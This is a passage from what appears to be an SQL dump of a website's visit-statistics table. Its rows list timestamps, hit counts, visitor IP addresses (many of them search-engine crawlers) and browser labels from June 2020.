me'),(513837,1592261946,2,2,0,0,'51.68.11.203','chrome'),(513838,1592262337,1,1,0,0,'31.177.95.126','chrome'),(513839,1592262348,2,2,0,0,'66.249.64.33','chrome'),(513840,1592262400,2,2,0,0,'66.249.70.72','chrome'),(513841,1592262570,1,1,0,0,'178.154.200.175','other'),(513842,1592263222,1,1,0,0,'2.47.39.215','other'),(513843,1592263330,2,2,0,0,'66.249.70.72','chrome'),(513844,1592263864,1,1,0,0,'52.158.252.119','other'),(513845,1592263917,1,1,0,0,'157.55.39.52','other'),(513846,1592264104,1,1,0,0,'66.249.64.36','chrome'),(513847,1592265148,3,3,0,0,'66.249.70.70','chrome'),(513848,1592265288,1,1,0,0,'66.249.70.72','chrome'),(513849,1592265306,1,1,0,0,'62.205.134.182','other'),(513850,1592266122,2,2,0,0,'66.249.70.70','chrome'),(513851,1592266445,1,1,0,0,'66.249.64.36','chrome'),(513852,1592266843,1,1,0,0,'66.249.64.38','chrome'),(513853,1592267061,5,5,0,0,'188.143.235.92','chrome'),(513854,1592267299,8,8,0,0,'185.11.82.228','other'),(513855,1592267312,1,1,0,0,'17.58.99.7','other'),(513856,1592267522,1,1,0,0,'66.249.70.69','chrome'),(513857,1592267565,1,1,0,0,'66.249.70.70','chrome'),(513858,1592268356,1,1,0,0,'66.249.70.72','chrome'),(513859,1592268437,2,1,1,0,'66.249.70.69',''),(513860,1592268911,1,1,0,0,'178.154.200.19','other'),(513861,1592269270,1,1,0,0,'66.249.70.70','chrome'),(513862,1592269459,1,1,0,0,'66.249.70.72','chrome'),(513863,1592269644,1,1,0,0,'66.249.64.36','chrome'),(513864,1592269748,1,1,0,0,'66.249.64.33','chrome'),(513865,1592269773,1,1,0,0,'157.55.39.75','other'),(513866,1592270174,2,2,0,0,'66.249.70.69','chrome'),(513867,1592270306,1,1,0,0,'207.46.13.214','other'),(513868,1592270772,1,1,0,0,'8.29.198.25','other'),(513869,1592270794,1,1,0,0,'8.29.198.26','other'),(513870,1592271904,1,1,0,0,'207.46.13.214','other'),(513871,1592271905,1,1,0,0,'66.249.64.38','chrome'),(513872,1592273417,1,1,0,0,'66.249.70.72','chrome'),(513873,1592273543,1,1,0,0,'213.180.203.16','other'),(513874,1592273798,1,1,0,0,'76.217.31.195','other'),(513875,1592274140,1,1,0,0,'207.46.13.214','other'),(513876,1592274617,2,2,0,0,'66.249.64.38','chrome'),(513877,1592274922,1,1,0,0,'66.249.70.69','chrome'),(513878,1592275088,1,1,0,0,'66.249.70.72','chrome'),(513879,1592275142,1,1,0,0,'209.17.96.82','other'),(513880,1592275250,1,1,0,0,'157.55.39.75','other'),(513881,1592275356,1,1,0,0,'66.249.70.70','chrome'),(513882,1592276609,1,1,0,0,'178.154.200.222','other'),(513883,1592276626,2,2,0,0,'66.249.70.70','chrome'),(513884,1592277281,2,2,0,0,'207.46.13.214','other'),(513885,1592277804,3,3,0,0,'95.217.115.62','other'),(513886,1592278052,2,2,0,0,'66.249.70.72','chrome'),(513887,1592278652,1,1,0,0,'66.249.70.69','chrome'),(513888,1592278791,1,1,0,0,'66.249.64.38','chrome'),(513889,1592278859,1,1,0,0,'31.13.115.17','other'),(513890,1592278860,1,1,0,0,'31.13.115.6','other'),(513892,1592279470,2,2,0,0,'66.249.70.72','chrome'),(513893,1592279856,1,1,0,0,'213.180.203.16','other'),(513894,1592279904,1,1,0,0,'66.249.70.70','chrome'),(513895,1592280064,2,2,0,0,'89.46.106.215','chrome'),(513896,1592280111,2,2,0,0,'154.81.86.238','chrome'),(513897,1592280478,1,1,0,0,'66.249.70.72','chrome'),(513898,1592280993,1,1,0,0,'157.55.39.52','other'),(513899,1592281234,8,8,0,0,'185.11.82.228','other'),(513900,1592281606,1,1,0,0,'8.29.198.27','other'),(513901,1592281629,1,1,0,0,'8.29.198.25','other'),(513902,1592281841,2,2,0,0,'154.81.86.238','chrome'),(513903,1592282244,1,1,0,0,'66.249.70.70','chrome'),(513904,1592283252,1,1,0,0,'62.205.134.182','other'),(513905,1592283279,2,2,0,0,'173.249.144.234','chrome'),(513906,1592283519,2,2,0,0,'49.0.2.26','chrome'),(513907,1592283751,1,0,1,0,'66.249.70.70',''),(513908,1592284017,1,1,0,0,'157.55.39.52','other'),(513909,1592284666,1,1,0,0,'207.46.13.214','other'),(513910,1592284922,1,1,0,0,'66.249.70.70','chrome'),(513911,1592284948,1,1,0,0,'66.249.70.69','chrome'),(513912,1592285029,2,2,0,0,'202.74.238.105','chrome'),(513913,1592285825,1,1,0,0,'185.99.3.25','firefox'),(513914,1592285859,1,1,0,0,'17.58.99.7','other'),(513915,1592286360,1,1,0,0,'91.196.178.176','chrome'),(513916,1592286773,5,5,0,0,'103.254.148.111','chrome'),(513917,1592286888,1,1,0,0,'185.197.160.54','firefox'),(513918,1592286983,1,1,0,0,'66.249.70.69','chrome'),(513919,1592287156,1,1,0,0,'66.249.70.72','chrome'),(513920,1592287662,1,0,1,0,'66.249.70.70',''),(513921,1592288313,2,2,0,0,'193.202.110.21','chrome'),(513922,1592288371,2,2,0,0,'51.68.11.227','chrome'),(513923,1592288445,2,2,0,0,'198.46.81.60','chrome'),(513924,1592288800,1,1,0,0,'66.249.70.72','chrome'),(513925,1592289382,1,1,0,0,'66.249.70.70','chrome'),(513926,1592289962,1,1,0,0,'91.196.178.176','chrome'),(513927,1592290615,2,2,0,0,'104.207.233.143','chrome'),(513928,1592290713,1,1,0,0,'66.249.70.70','chrome'),(513929,1592291364,1,1,0,0,'91.196.178.87','chrome'),(513930,1592291539,1,1,0,0,'66.249.70.69','chrome'),(513931,1592291945,1,1,0,0,'17.58.99.7','other'),(513932,1592292090,1,1,0,0,'176.118.166.51','firefox'),(513933,1592292437,2,2,0,0,'8.29.198.27','other'),(513934,1592293130,1,1,0,0,'131.220.6.152','chrome'),(513935,1592293361,1,1,0,0,'37.73.4.153','chrome'),(513936,1592293612,1,1,0,0,'66.249.70.72','chrome'),(513937,1592294003,1,1,0,0,'130.180.210.149','chrome'),(513938,1592294352,2,2,0,0,'207.46.13.214','other'),(513939,1592294640,3,3,0,0,'157.55.39.75','other'),(513940,1592294891,1,1,0,0,'110.167.244.101','msie'),(513941,1592295195,1,1,0,0,'66.249.70.72','chrome'),(513942,1592295279,1,1,0,0,'130.180.210.149','chrome'),(513943,1592295332,1,1,0,0,'130.180.220.133','chrome'),(513944,1592295592,1,1,0,0,'91.196.177.46','chrome'),(513945,1592296250,1,1,0,0,'91.196.178.169','chrome'),(513946,1592296865,1,1,0,0,'66.249.70.70','chrome'),(513947,1592296892,1,1,0,0,'91.234.79.139','chrome'),(513948,1592297540,2,2,0,0,'66.249.70.69','chrome'),(513949,1592297602,2,2,0,0,'66.249.70.72','chrome'),(513950,1592297678,2,2,0,0,'66.249.64.38','chrome'),(513951,1592297951,1,1,0,0,'31.177.95.122','chrome'),(513952,1592298050,1,1,0,0,'66.249.70.70','chrome'),(513953,1592298120,1,1,0,0,'66.249.64.33','chrome'),(513954,1592298125,1,1,0,0,'66.249.64.36','chrome'),(513955,1592298544,1,1,0,0,'91.196.177.46','chrome'),(513956,1592298620,1,1,0,0,'66.249.70.72','chrome'),(513957,1592299024,1,1,0,0,'66.249.70.70','chrome'),(513958,1592299692,1,1,0,0,'37.73.4.153','chrome'),(513959,1592300019,1,1,0,0,'66.249.70.69','chrome'),(513960,1592300636,1,1,0,0,'178.154.200.222','other'),(513961,1592300638,1,1,0,0,'178.154.200.220','other'),(513962,1592300641,2,2,0,0,'66.249.70.70','chrome'),(513963,1592300788,2,2,0,0,'66.249.70.72','chrome'),(513964,1592300799,1,1,0,0,'66.249.64.33','chrome'),(513965,1592301061,3,3,0,0,'66.249.70.69','chrome'),(513966,1592301092,1,1,0,0,'157.55.39.52','other'),(513967,1592301137,1,1,0,0,'49.0.2.26','chrome'),(513968,1592301166,1,1,0,0,'46.30.40.99','chrome'),(513969,1592301413,1,1,0,0,'91.196.178.91','firefox'),(513970,1592301486,1,1,0,0,'157.55.39.75','other'),(513971,1592301651,1,1,0,0,'13.59.92.96','chrome'),(513972,1592301823,3,3,0,0,'66.249.70.70','chrome'),(513973,1592302067,1,1,0,0,'91.196.178.87','chrome'),(513974,1592302154,1,1,0,0,'185.252.146.212','firefox'),(513975,1592302254,2,2,0,0,'66.249.70.72','chrome'),(513976,1592302449,1,1,0,0,'66.249.64.36','chrome'),(513977,1592302617,1,1,0,0,'93.188.2.5','chrome'),(513978,1592302784,1,1,0,0,'192.157.230.165','chrome'),(513979,1592302801,2,2,0,0,'27.254.140.71','chrome'),(513980,1592302925,1,1,0,0,'78.129.222.182','chrome'),(513981,1592302998,1,1,0,0,'91.196.178.87','chrome'),(513982,1592303267,1,1,0,0,'8.29.198.27','other'),(513983,1592303284,1,1,0,0,'8.29.198.26','other'),(513984,1592303385,2,2,0,0,'66.249.70.70','chrome'),(513985,1592303484,1,1,0,0,'66.249.64.38','chrome'),(513986,1592303549,2,2,0,0,'66.249.70.69','chrome'),(513987,1592303592,2,2,0,0,'157.55.39.52','other'),(513988,1592303864,1,1,0,0,'66.249.64.33','chrome'),(513989,1592303968,1,1,0,0,'207.46.13.214','other'),(513990,1592304075,2,2,0,0,'52.206.118.20','chrome'),(513991,1592304197,1,1,0,0,'109.74.154.72','chrome'),(513992,1592304383,1,1,0,0,'91.196.178.171','chrome'),(513993,1592304808,1,1,0,0,'81.2.195.181','chrome'),(513994,1592304845,1,1,0,0,'157.55.39.75','other'),(513995,1592304879,1,1,0,0,'66.249.64.36','chrome'),(513996,1592305116,3,3,0,0,'66.249.70.70','chrome'),(513997,1592305371,1,1,0,0,'157.55.39.52','other'),(513998,1592305461,1,1,0,0,'66.249.64.33','chrome'),(513999,1592306345,2,2,0,0,'66.249.70.70','chrome'),(514000,1592306373,5,5,0,0,'66.249.70.69','chrome'),(514001,1592306476,1,1,0,0,'91.196.177.46','chrome'),(514002,1592306478,1,1,0,0,'91.196.178.173','chrome'),(514003,1592306608,1,1,0,0,'157.55.39.52','other'),(514004,1592306782,3,3,0,0,'66.249.70.72','chrome'),(514005,1592307133,3,3,0,0,'66.249.64.36','chrome'),(514006,1592307206,1,1,0,0,'94.153.15.75','chrome'),(514007,1592307278,2,2,0,0,'51.68.11.195','chrome'),(514008,1592307375,2,2,0,0,'66.249.70.69','chrome'),(514009,1592307393,4,4,0,0,'66.249.70.70','chrome'),(514010,1592307900,1,1,0,0,'195.69.221.54','chrome'),(514011,1592307934,1,1,0,0,'91.196.178.87','chrome'),(514012,1592307938,1,1,0,0,'157.55.39.75','other'),(514013,1592307943,2,2,0,0,'207.46.13.214','other'),(514014,1592308016,1,1,0,0,'91.196.177.46','chrome'),(514015,1592308098,1,1,0,0,'66.249.64.33','chrome'),(514016,1592308130,1,1,0,0,'157.55.39.52','other'),(514017,1592309017,2,2,0,0,'66.249.70.72','chrome'),(514018,1592309320,2,2,0,0,'66.249.70.69','chrome'),(514019,1592309855,2,2,0,0,'66.249.70.70','chrome'),(514020,1592310562,2,2,0,0,'66.249.70.72','chrome'),(514021,1592310702,1,1,0,0,'66.249.70.69','chrome'),(514022,1592310714,1,1,0,0,'157.55.39.52','other'),(514023,1592310862,1,1,0,0,'66.249.64.38','chrome'),(514024,1592311019,1,1,0,0,'37.73.76.114','chrome'),(514025,1592311247,1,1,0,0,'91.196.177.228','chrome'),(514026,1592311306,1,1,0,0,'66.249.64.33','chrome'),(514027,1592311749,2,2,0,0,'157.55.39.75','other'),(514028,1592312015,6,1,5,0,'66.249.70.72',''),(514029,1592312082,4,3,1,0,'66.249.70.69',''),(514030,1592312179,2,2,0,0,'66.249.64.36','chrome'),(514031,1592312312,3,1,2,0,'66.249.70.70',''),(514032,1592312455,3,2,1,0,'66.249.70.69',''),(514033,1592312471,38,37,1,0,'66.249.70.69',''),(514034,1592312473,5,5,0,0,'66.249.70.72','chrome'),(514035,1592312477,10,10,0,0,'66.249.70.70','chrome'),(514036,1592312597,2,2,0,0,'66.249.70.69','chrome'),(514037,1592312675,1,1,0,0,'207.46.13.214','other'),(514038,1592312783,1,1,0,0,'46.211.30.191','chrome'),(514039,1592313380,1,1,0,0,'157.55.39.52','other'),(514040,1592313608,2,2,0,0,'66.249.70.69','chrome'),(514041,1592313720,1,1,0,0,'89.46.104.160','chrome'),(514042,1592314107,2,2,0,0,'8.29.198.25','other'),(514043,1592314265,1,1,0,0,'66.102.9.169','chrome'),(514044,1592314470,2,2,0,0,'66.249.64.38','chrome'),(514045,1592314494,1,1,0,0,'66.249.70.70','chrome'),(514046,1592315153,1,1,0,0,'66.249.70.72','chrome'),(514047,1592315225,1,1,0,0,'85.25.237.25','chrome'),(514048,1592315397,4,4,0,0,'66.249.70.70','chrome'),(514049,1592315481,1,1,0,0,'91.196.178.87','chrome'),(514050,1592315504,1,1,0,0,'157.55.39.75','other'),(514051,1592315969,24,24,0,0,'62.210.78.76','other'),(514052,1592315990,1,1,0,0,'46.211.9.249','chrome'),(514053,1592315993,1,1,0,0,'66.249.64.33','chrome'),(514054,1592316151,1,1,0,0,'66.249.70.72','chrome'),(514055,1592316160,1,1,0,0,'66.249.64.36','chrome'),(514056,1592316354,1,1,0,0,'91.196.178.181','chrome'),(514057,1592316479,1,1,0,0,'66.249.64.38','chrome'),(514058,1592316566,1,1,0,0,'136.243.54.204','chrome'),(514059,1592317630,1,1,0,0,'66.249.70.70','chrome'),(514060,1592317653,1,1,0,0,'66.249.70.69','chrome'),(514061,1592317840,1,1,0,0,'91.196.178.176','chrome'),(514062,1592317863,1,1,0,0,'66.249.64.38','chrome'),(514063,1592317873,2,2,0,0,'66.249.64.33','chrome'),(514064,1592318016,1,1,0,0,'93.76.2.214','chrome'),(514065,1592318090,1,1,0,0,'66.249.64.36','chrome'),(514066,1592318501,2,2,0,0,'51.77.125.148','chrome'),(514067,1592318554,2,2,0,0,'66.249.70.72','chrome'),(514068,1592318588,1,1,0,0,'66.249.70.69','chrome'),(514069,1592318951,4,4,0,0,'186.233.144.213','chrome'),(514070,1592319176,1,1,0,0,'194.61.24.94','other'),(514071,1592319199,2,2,0,0,'66.249.70.70','chrome'),(514072,1592319529,1,1,0,0,'66.249.64.38','chrome'),(514073,1592319543,6,6,0,0,'66.249.70.69','chrome'),(514074,1592319544,1,1,0,0,'207.46.13.214','other'),(514075,1592319641,1,1,0,0,'66.249.64.33','chrome'),(514076,1592319787,1,1,0,0,'198.100.149.227','chrome'),(514077,1592320255,1,1,0,0,'66.249.70.72','chrome'),(514078,1592320289,1,1,0,0,'66.249.64.36','chrome'),(514079,1592320517,1,1,0,0,'178.154.200.222','other'),(514080,1592320882,1,1,0,0,'91.196.178.155','chrome'),(514081,1592320951,2,2,0,0,'52.206.118.20','chrome'),(514082,1592321191,3,3,0,0,'66.249.70.70','chrome'),(514083,1592321440,8,8,0,0,'185.11.82.228','other'),(514084,1592321491,2,2,0,0,'66.249.70.72','chrome'),(514085,1592321623,4,4,0,0,'66.249.64.33','chrome'),(514086,1592321908,1,1,0,0,'157.55.39.52','other'),(514087,1592321976,1,1,0,0,'45.136.108.44','other'),(514088,1592322503,1,1,0,0,'77.74.177.113','chrome'),(514089,1592322548,2,2,0,0,'207.46.13.214','other'),(514090,1592322668,1,1,0,0,'178.133.101.176','chrome'),(514091,1592322670,1,1,0,0,'66.249.64.33','chrome'),(514092,1592322899,1,1,0,0,'66.249.70.70','chrome'),(514093,1592322901,1,1,0,0,'17.58.99.7','other'),(514094,1592322909,1,1,0,0,'77.222.143.222','chrome'),(514095,1592322964,1,1,0,0,'178.154.200.222','other'),(514096,1592323309,1,1,0,0,'157.55.39.75','other'),(514097,1592323349,2,2,0,0,'66.249.70.72','chrome'),(514098,1592323419,1,1,0,0,'195.69.221.54','chrome'),(514099,1592323732,2,2,0,0,'66.249.70.69','chrome'),(514100,1592324446,1,1,0,0,'178.154.200.222','other'),(514101,1592324478,1,1,0,0,'178.154.200.97','other'),(514102,1592324588,1,1,0,0,'207.46.13.214','other'),(514103,1592324861,3,3,0,0,'66.249.64.33','chrome'),(514104,1592324941,1,1,0,0,'8.29.198.26','other'),(514105,1592324953,1,1,0,0,'8.29.198.27','other'),(514106,1592325030,1,1,0,0,'66.249.64.36','chrome'),(514107,1592325075,1,1,0,0,'46.211.20.14','chrome'),(514108,1592325331,1,1,0,0,'192.185.81.239','chrome'),(514109,1592325460,3,3,0,0,'66.249.70.69','chrome'),(514110,1592325522,3,3,0,0,'66.249.70.72','chrome'),(514111,1592325828,1,1,0,0,'103.35.65.203','chrome'),(514112,1592326042,2,2,0,0,'66.249.70.70','chrome'),(514113,1592326155,1,1,0,0,'207.46.13.214','other'),(514114,1592326893,1,1,0,0,'66.249.70.69','chrome'),(514115,1592326980,1,1,0,0,'66.249.70.72','chrome'),(514116,1592327014,2,2,0,0,'89.46.107.92','chrome'),(514117,1592327190,1,1,0,0,'50.87.144.198','chrome'),(514118,1592327404,1,1,0,0,'51.68.11.223','chrome'),(514119,1592327408,3,3,0,0,'66.249.70.70','chrome'),(514120,1592327961,2,2,0,0,'66.249.70.72','chrome'),(514121,1592328086,2,2,0,0,'157.55.39.52','other'),(514122,1592329240,2,2,0,0,'66.249.70.72','chrome'),(514123,1592329435,1,1,0,0,'81.2.195.182','chrome'),(514124,1592329771,2,2,0,0,'66.249.70.70','chrome'),(514125,1592330262,1,1,0,0,'213.180.203.16','other'),(514126,1592330294,3,3,0,0,'66.249.70.72','chrome'),(514127,1592330767,1,1,0,0,'107.165.35.82','chrome'),(514128,1592330834,1,1,0,0,'66.249.64.38','chrome'),(514129,1592331248,2,2,0,0,'66.249.64.36','chrome'),(514130,1592331308,3,3,0,0,'66.249.70.70','chrome'),(514131,1592331606,2,2,0,0,'66.249.70.72','chrome'),(514132,1592331620,5,5,0,0,'66.249.70.69','chrome'),(514133,1592332098,1,1,0,0,'81.2.195.182','chrome'),(514134,1592332205,1,1,0,0,'91.200.184.186','chrome'),(514135,1592332239,1,1,0,0,'91.196.178.66','firefox'),(514136,1592332446,2,2,0,0,'167.172.174.199','chrome'),(514137,1592332631,1,1,0,0,'207.46.13.214','other'),(514138,1592333082,1,1,0,0,'91.196.178.21','chrome'),(514139,1592333116,1,1,0,0,'66.249.64.33','chrome'),(514140,1592333156,1,1,0,0,'37.73.215.224','chrome'),(514141,1592333159,8,8,0,0,'185.11.82.228','other'),(514142,1592333360,1,1,0,0,'66.249.70.72','chrome'),(514143,1592333595,1,1,0,0,'51.140.160.223','chrome'),(514144,1592333752,1,1,0,0,'66.249.70.69','chrome'),(514145,1592334246,1,1,0,0,'157.55.39.52','other'),(514146,1592334247,2,2,0,0,'159.100.187.120','chrome'),(514147,1592334390,2,2,0,0,'66.249.70.72','chrome'),(514148,1592334439,1,1,0,0,'66.249.70.70','chrome'),(514149,1592334465,3,3,0,0,'66.249.64.38','chrome'),(514150,1592334497,8,8,0,0,'185.11.82.228','other'),(514151,1592334534,2,2,0,0,'51.68.11.215','chrome'),(514152,1592334904,1,1,0,0,'178.154.200.222','other'),(514153,1592335173,1,1,0,0,'157.55.39.52','other'),(514154,1592335372,2,2,0,0,'66.249.70.70','chrome'),(514155,1592335392,2,2,0,0,'66.249.70.69','chrome'),(514156,1592335437,1,1,0,0,'66.249.64.33','chrome'),(514157,1592335777,1,1,0,0,'8.29.198.26','other'),(514158,1592335786,1,1,0,0,'8.29.198.27','other'),(514159,1592335809,1,1,0,0,'66.249.70.72','chrome'),(514160,1592335878,8,8,0,0,'185.11.82.228','other'),(514161,1592336199,1,1,0,0,'207.46.13.214','other'),(514162,1592336359,1,1,0,0,'178.255.72.122','chrome'),(514163,1592336577,3,3,0,0,'66.249.70.69','chrome'),(514164,1592336830,1,1,0,0,'136.243.173.249','chrome'),(514165,1592336841,2,2,0,0,'66.249.64.36','chrome'),(514166,1592337005,1,1,0,0,'213.180.203.16','other'),(514167,1592337168,1,1,0,0,'66.249.70.72','chrome'),(514168,1592337227,1,1,0,0,'66.249.70.70','chrome'),(514169,1592337312,8,8,0,0,'185.11.82.228','other'),(514170,1592337335,1,1,0,0,'207.46.13.214','other'),(514171,1592337531,2,2,0,0,'66.249.70.69','chrome'),(514172,1592338156,1,1,0,0,'66.249.64.38','chrome'),(514173,1592338225,1,1,0,0,'91.196.178.153','chrome'),(514174,1592338314,2,2,0,0,'66.249.70.72','chrome'),(514175,1592338359,1,1,0,0,'69.49.117.147','chrome'),(514176,1592338375,3,3,0,0,'45.76.213.227','chrome'),(514177,1592338400,1,1,0,0,'66.147.238.141','chrome'),(514178,1592338706,8,8,0,0,'185.11.82.228','other'),(514179,1592339267,4,4,0,0,'66.249.70.70','chrome'),(514180,1592339794,1,1,0,0,'66.249.70.72','chrome'),(514181,1592339831,1,1,0,0,'66.249.70.69','chrome'),(514182,1592340085,8,8,0,0,'185.11.82.228','other'),(514183,1592340097,1,1,0,0,'46.4.107.106','other'),(514184,1592340125,1,1,0,0,'157.55.39.52','other'),(514185,1592340177,1,1,0,0,'66.249.64.36','chrome'),(514186,1592340374,1,1,0,0,'17.58.99.7','other'),(514187,1592340590,3,3,0,0,'66.249.70.70','chrome'),(514188,1592340734,2,2,0,0,'207.46.13.214','other'),(514189,1592341204,4,4,0,0,'66.249.70.72','chrome'),(514190,1592341509,8,8,0,0,'185.11.82.228','other'),(514191,1592341973,1,1,0,0,'207.46.13.214','other'),(514192,1592342479,1,1,0,0,'185.26.122.64','chrome'),(514193,1592342684,1,1,0,0,'103.86.51.69','chrome'),(514194,1592342875,8,8,0,0,'185.11.82.228','other'),(514195,1592343189,1,0,1,0,'66.249.70.69',''),(514196,1592343224,2,2,0,0,'66.249.70.69','chrome'),(514197,1592343409,1,1,0,0,'95.158.42.161','chrome'),(514198,1592343670,3,3,0,0,'178.154.200.222','other'),(514199,1592344228,8,8,0,0,'185.11.82.228','other'),(514200,1592344267,2,2,0,0,'66.249.70.70','chrome'),(514201,1592344373,1,1,0,0,'66.249.64.38','chrome'),(514202,1592344716,1,1,0,0,'66.249.64.36','chrome'),(514203,1592345002,1,1,0,0,'66.249.64.33','chrome'),(514204,1592345068,2,2,0,0,'66.249.70.69','chrome'),(514205,1592345594,8,8,0,0,'185.11.82.228','other'),(514206,1592345693,1,1,0,0,'130.180.219.213','chrome'),(514207,1592345839,1,1,0,0,'52.158.252.119','other'),(514208,1592346263,2,2,0,0,'66.249.70.70','chrome'),(514209,1592346547,1,1,0,0,'66.249.70.72','chrome'),(514210,1592346614,1,1,0,0,'8.29.198.25','other'),(514211,1592346627,1,1,0,0,'8.29.198.27','other'),(514212,1592346648,1,1,0,0,'66.249.64.38','chrome'),(514213,1592347004,8,8,0,0,'185.11.82.228','other'),(514214,1592347197,1,1,0,0,'99.203.202.56','other'),(514215,1592347609,1,1,0,0,'207.46.13.214','other'),(514216,1592348105,3,3,0,0,'66.249.70.70','chrome'),(514217,1592348283,8,8,0,0,'185.11.82.228','other'),(514218,1592348370,2,2,0,0,'66.249.70.69','chrome'),(514219,1592348504,1,1,0,0,'176.107.178.60','chrome'),(514220,1592348564,2,2,0,0,'157.55.39.75','other'),(514221,1592348651,1,1,0,0,'178.154.200.222','other'),(514222,1592348845,2,2,0,0,'194.181.228.60','chrome'),(514223,1592349001,1,1,0,0,'66.249.64.33','chrome'),(514224,1592349003,1,1,0,0,'66.249.70.72','chrome'),(514225,1592349133,1,1,0,0,'88.99.26.12','chrome'),(514226,1592349627,8,8,0,0,'185.11.82.228','other'),(514227,1592349716,1,1,0,0,'17.58.99.7','other'),(514228,1592349869,1,1,0,0,'66.249.70.70','chrome'),(514229,1592350261,1,1,0,0,'66.249.70.69','chrome'),(514230,1592351058,1,1,0,0,'66.249.64.38','chrome'),(514231,1592351110,2,2,0,0,'51.68.11.223','chrome'),(514232,1592351311,8,8,0,0,'185.11.82.228','other'),(514233,1592351706,1,1,0,0,'62.205.134.182','other'),(514234,1592352092,1,1,0,0,'66.249.64.33','chrome'),(514235,1592352597,8,8,0,0,'185.11.82.228','other'),(514236,1592352696,1,1,0,0,'66.249.70.69','chrome'),(514237,1592352767,1,1,0,0,'66.249.70.72','chrome'),(514238,1592352800,2,2,0,0,'66.249.70.70','chrome'),(514239,1592353064,1,1,0,0,'157.55.39.52','other'),(514240,1592353144,2,2,0,0,'89.46.107.202','chrome'),(514241,1592353248,1,1,0,0,'51.68.11.215','chrome'),(514242,1592353424,3,3,0,0,'178.154.200.222','other'),(514243,1592353903,8,8,0,0,'185.11.82.228','other'),(514244,1592354289,2,2,0,0,'66.249.64.36','chrome'),(514245,1592354521,1,1,0,0,'207.46.13.214','other'),(514246,1592354909,1,1,0,0,'51.68.11.211','chrome'),(514247,1592355029,2,2,0,0,'207.7.80.157','chrome'),(514248,1592355052,4,4,0,0,'66.249.70.70','chrome'),(514249,1592355061,2,2,0,0,'66.249.70.72','chrome'),(514250,1592355171,8,8,0,0,'185.11.82.228','other'),(514251,1592355350,1,1,0,0,'213.180.203.16','other'),(514252,1592356121,1,1,0,0,'66.249.70.72','chrome'),(514253,1592356137,2,2,0,0,'66.249.70.69','chrome'),(514254,1592356438,8,8,0,0,'185.11.82.228','other'),(514255,1592356538,2,2,0,0,'66.249.70.70','chrome'),(514256,1592356736,1,1,0,0,'17.58.99.7','other'),(514257,1592356969,1,1,0,0,'213.180.203.16','other'),(514258,1592356999,1,1,0,0,'89.46.104.195','chrome'),(514259,1592357011,2,2,0,0,'187.45.193.210','chrome'),(514260,1592357186,1,1,0,0,'66.249.70.72','chrome'),(514261,1592357326,2,2,0,0,'198.46.81.27','chrome'),(514262,1592357444,2,2,0,0,'8.29.198.26','other'),(514263,1592357470,2,2,0,0,'51.68.11.215','chrome'),(514264,1592357510,2,2,0,0,'66.249.70.69','chrome'),(514265,1592357709,1,1,0,0,'66.249.70.70','chrome'),(514266,1592357752,8,8,0,0,'185.11.82.228','other'),(514267,1592358472,1,1,0,0,'207.46.13.214','other'),(514268,1592358652,1,1,0,0,'66.249.70.70','chrome'),(514269,1592358657,2,2,0,0,'66.249.70.69','chrome'),(514270,1592358762,2,2,0,0,'178.154.200.222','other'),(514271,1592359030,8,8,0,0,'185.11.82.228','other'),(514272,1592359052,1,1,0,0,'145.239.29.8','chrome'),(514273,1592359120,1,1,0,0,'46.32.240.33','chrome'),(514274,1592359377,1,1,0,0,'178.154.200.220','other'),(514275,1592359611,2,2,0,0,'66.249.70.72','chrome'),(514276,1592359682,3,3,0,0,'66.249.70.69','chrome'),(514277,1592359688,1,1,0,0,'66.249.70.70','chrome'),(514278,1592359901,1,1,0,0,'178.154.200.222','other'),(514279,1592360238,8,8,0,0,'185.11.82.228','other'),(514280,1592360995,1,1,0,0,'178.154.200.222','chrome'),(514281,1592361041,1,1,0,0,'213.180.203.16','other'),(514282,1592361123,1,1,0,0,'89.46.107.212','chrome'),(514283,1592361209,1,1,0,0,'66.249.64.33','chrome'),(514284,1592361238,1,1,0,0,'51.68.11.207','chrome'),(514285,1592361468,2,2,0,0,'156.230.21.2','chrome'),(514286,1592361537,8,8,0,0,'185.11.82.228','other'),(514287,1592361641,1,1,0,0,'66.249.70.69','chrome'),(514288,1592362034,2,2,0,0,'66.249.70.70','chrome'),(514289,1592362791,8,8,0,0,'185.11.82.228','other'),(514290,1592362901,1,1,0,0,'66.249.64.38','chrome'),(514291,1592362948,1,1,0,0,'66.249.70.72','chrome'),(514292,1592362951,3,3,0,0,'66.249.70.70','chrome'),(514293,1592363289,1,1,0,0,'66.249.64.33','chrome'),(514294,1592363351,1,1,0,0,'157.55.39.52','other'),(514295,1592363535,1,1,0,0,'195.128.17.206','other'),(514296,1592363585,1,1,0,0,'213.180.203.16','other'),(514297,1592364039,8,8,0,0,'185.11.82.228','other'),(514298,1592364416,1,1,0,0,'157.55.39.52','other'),(514299,1592364546,2,2,0,0,'66.249.70.70','chrome'),(514300,1592365325,8,8,0,0,'185.11.82.228','other'),(514301,1592366006,1,1,0,0,'178.154.200.222','other'),(514302,1592366631,8,8,0,0,'185.11.82.228','other'),(514303,1592367043,1,1,0,0,'213.180.203.95','other'),(514304,1592367068,1,1,0,0,'66.249.70.72','chrome'),(514305,1592367871,1,1,0,0,'178.154.200.97','other'),(514306,1592367922,1,1,0,0,'66.249.70.69','chrome'),(514307,1592367934,8,8,0,0,'185.11.82.228','other'),(514308,1592368024,1,1,0,0,'66.249.70.70','chrome'),(514309,1592368042,1,1,0,0,'81.2.195.186','chrome'),(514310,1592368055,2,2,0,0,'212.158.174.121','chrome'),(514311,1592368271,1,1,0,0,'8.29.198.25','other'),(514312,1592368293,1,1,0,0,'8.29.198.26','other'),(514313,1592368319,1,1,0,0,'17.58.99.7','other'),(514314,1592368526,2,2,0,0,'66.249.70.72','chrome'),(514315,1592369253,8,8,0,0,'185.11.82.228','other'),(514316,1592369307,2,2,0,0,'66.249.70.69','chrome'),(514317,1592369505,1,1,0,0,'62.205.134.182','other'),(514318,1592369872,1,1,0,0,'186.232.248.40','chrome'),(514319,1592369885,1,1,0,0,'66.249.70.72','chrome'),(514320,1592370007,1,1,0,0,'66.249.64.38','chrome'),(514321,1592370107,1,1,0,0,'17.58.99.7','other'),(514322,1592370466,1,1,0,0,'178.154.200.119','other'),(514323,1592370561,8,8,0,0,'185.11.82.228','other'),(514324,1592370711,1,1,0,0,'178.154.200.216','other'),(514325,1592370849,1,1,0,0,'66.249.70.72','chrome'),(514326,1592371763,1,1,0,0,'178.154.200.196','other'),(514327,1592371773,1,0,1,0,'66.249.70.70',''),(514328,1592371894,1,1,0,0,'66.249.70.70','chrome'),(514329,1592371969,8,8,0,0,'185.11.82.228','other'),(514330,1592371984,2,2,0,0,'91.196.178.176','chrome'),(514331,1592372815,1,1,0,0,'66.249.70.70','chrome'),(514332,1592373381,8,8,0,0,'185.11.82.228',